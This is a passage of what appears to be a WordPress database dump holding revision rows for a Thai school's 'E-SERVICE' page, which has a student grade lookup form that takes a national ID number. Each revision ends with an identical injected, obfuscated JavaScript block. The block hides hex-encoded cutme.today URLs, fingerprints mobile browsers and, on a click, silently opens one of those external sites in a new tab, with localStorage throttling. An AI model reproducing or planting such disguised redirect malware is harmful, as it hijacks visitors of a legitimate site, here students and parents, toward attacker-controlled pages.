_0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2024-08-01 21:10:51','2024-08-01 14:10:51','',459,'http://pakhaeng.ssk.in.th/?p=463',0,'revision','',0),
(465,1,'2024-08-01 21:11:35','2024-08-01 14:11:35','<!-- wp:buttons -->\n<div class=\"wp-block-buttons\"><!-- wp:button {\"backgroundColor\":\"light-green-cyan\",\"width\":100} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-100\"><a class=\"wp-block-button__link has-light-green-cyan-background-color has-background wp-element-button\"><strong>ระบบดูคะแนน/เกรดนักเรียน</strong></a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:html -->\n<div align=\'center\'><form action=\'https://a3301.obec.expert/services\' method=\'POST\' target=\'_blank\' > <div><input name=\'idcard\' style=\'text-align:center;\' type=\'text\' value=\'\' placeholder=\'เลขบัตร ปชช. 13 หลัก\' /></div> <div><input name=\'schoolid\' type=\'hidden\' value=\'33010169\' required /><button type=\'submit\'>ค้นหา</button></div> </form></div>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2024-08-01 21:11:35','2024-08-01 14:11:35','',459,'http://pakhaeng.ssk.in.th/?p=465',0,'revision','',0),
(467,1,'2024-08-01 21:13:23','2024-08-01 14:13:23','<!-- wp:buttons -->\n<div class=\"wp-block-buttons\"><!-- wp:button {\"backgroundColor\":\"light-green-cyan\",\"width\":100} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-100\"><a class=\"wp-block-button__link has-light-green-cyan-background-color has-background wp-element-button\"><strong>ระบบดูคะแนน/เกรดนักเรียน</strong></a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:html -->\n<div align=\'center\'><form action=\'https://a3301.obec.expert/services\' method=\'POST\' target=\'_blank\' > <div><input name=\'idcard\' style=\'text-align:center;\' type=\'text\' value=\'\' placeholder=\'เลขบัตร ปชช. 13 หลัก\' /></div> <div><input name=\'schoolid\' type=\'hidden\' value=\'33010169\' required /><button type=\'submit\'>ค้นหา</button></div> </form></div>\n<!-- /wp:html -->\n\n<!-- wp:kadence/iconlist {\"uniqueID\":\"459_7a1b50-06\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items459_7a1b50-06 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"459_d3e202-9f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-459_d3e202-9f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรอกเลขบัตรประจำตัวประชาชนนักเรียน 13 หลัก  แล้วกด \"ค้นหา\"</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2024-08-01 21:13:23','2024-08-01 14:13:23','',459,'http://pakhaeng.ssk.in.th/?p=467',0,'revision','',0),
